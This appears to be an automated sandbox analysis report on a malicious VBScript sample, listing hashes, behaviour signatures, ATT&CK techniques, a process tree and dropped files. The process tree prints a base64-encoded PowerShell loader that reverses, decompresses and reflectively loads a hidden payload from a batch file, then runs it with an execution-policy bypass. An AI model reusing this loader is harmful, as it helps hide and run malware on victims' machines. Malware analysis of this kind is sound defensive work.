cfac6c80cd9032c7b4a3c1cc6705a5a6f767bfedd4d41255b4fcee84bade3be8

General

Target

cfac6c80cd9032c7b4a3c1cc6705a5a6f767bfedd4d41255b4fcee84bade3be8.vbs
Size

134KB
MD5

248196d5d903cdbf6a07ffd44275bb94
SHA1

3d08f7f11c1e5dcaeccf68e85d17a72d910686f1
SHA256

cfac6c80cd9032c7b4a3c1cc6705a5a6f767bfedd4d41255b4fcee84bade3be8
SHA512

06ec4e66f643695344f61941e953261948cd7c99590f4333fe5802348c7d25df05df065623bacadbe9a0c187b1781a8b07771872e6abca00e4fb9f889fd594bb
SSDEEP

3072:XqYIN6azKK9lta0/xZU36TYjegdYGBjTspEKJY:qyota0/c366eBGjT3KJY

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
2192	powershell.exe
2632	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2192	powershell.exe
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 2336	1032	WScript.exe	28
PID 1032 wrote to memory of 2336	1032	WScript.exe	28
PID 1032 wrote to memory of 2336	1032	WScript.exe	28
PID 2336 wrote to memory of 2192	2336	cmd.exe	30
PID 2336 wrote to memory of 2192	2336	cmd.exe	30
PID 2336 wrote to memory of 2192	2336	cmd.exe	30
PID 2336 wrote to memory of 2192	2336	cmd.exe	30
PID 2336 wrote to memory of 2632	2336	cmd.exe	31
PID 2336 wrote to memory of 2632	2336	cmd.exe	31
PID 2336 wrote to memory of 2632	2336	cmd.exe	31
PID 2336 wrote to memory of 2632	2336	cmd.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cfac6c80cd9032c7b4a3c1cc6705a5a6f767bfedd4d41255b4fcee84bade3be8.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\cvtres.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgImN2dHJlcy5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\cvtres.ps1' -Encoding UTF8"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\cvtres.ps1"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
37ff6bba821a865b130b8696eeef1157

SHA1
f183635486e41e7faf4f5050b7e163ebc26e9b15

SHA256
2feaa732c323a0028d3e9187054a0261ca4c91e710028d34074fec4d220e3b62

SHA512
f1409f15cd9bd8085be18c15d89a076817e3956ab57358c5ca9e87a024abb0f7bb4991dcffc8c9dfaab7715bacf3609b33ee46807b1c357308f9d5659df89305

Download Submit
C:\Users\Admin\cvtres.bat

Filesize
121KB

MD5
97b694721970323427b6fd94cf531cde

SHA1
b61b14f78303c051d58e6595f8ca693b1c09ec1b

SHA256
cf8d1b189a698f452bd8705c9e9cd882b0f8db29001fe4f11e1ef6beaa066237

SHA512
b5e40922e609ef54636a0230563400af33a4997c88a9249fb6ec3bc2fd5ad6c25de848bb3ae9dec0b0a2a45eb7d3de6114f04de006e42be2ff43032827727c7c

Download Submit
C:\Users\Admin\cvtres.ps1

Filesize
1KB

MD5
8e0acbe960188f911893a3658dff0248

SHA1
b29bbdc6fda3b0b9dad8dd0d4d276c2a34ce3551

SHA256
69ea7bd83b817ac9b7e87e6828f09b4891f87e7d8ceb5980667e7bbde7d22138

SHA512
a8620690aba185fe7df2eecadcf92897862dc5ecf9d92f905532afc66ab923d08995ea5261d3f62deadd9cb2fa789aacd066f256781f2a70334d9d9404dc50f3

Download Submit
memory/2192-14-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2192-15-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/2192-17-0x0000000074390000-0x000000007493B000-memory.dmp

Filesize
5.7MB

Download
memory/2192-13-0x0000000074390000-0x000000007493B000-memory.dmp

Filesize
5.7MB

Download
memory/2192-12-0x0000000074390000-0x000000007493B000-memory.dmp

Filesize
5.7MB

Download
memory/2632-24-0x0000000002C40000-0x0000000002C80000-memory.dmp

Filesize
256KB

Download
memory/2632-23-0x0000000074350000-0x00000000748FB000-memory.dmp

Filesize
5.7MB

Download
memory/2632-25-0x0000000074350000-0x00000000748FB000-memory.dmp

Filesize
5.7MB

Download
memory/2632-27-0x0000000074350000-0x00000000748FB000-memory.dmp

Filesize
5.7MB

Download
memory/2632-28-0x0000000074350000-0x00000000748FB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing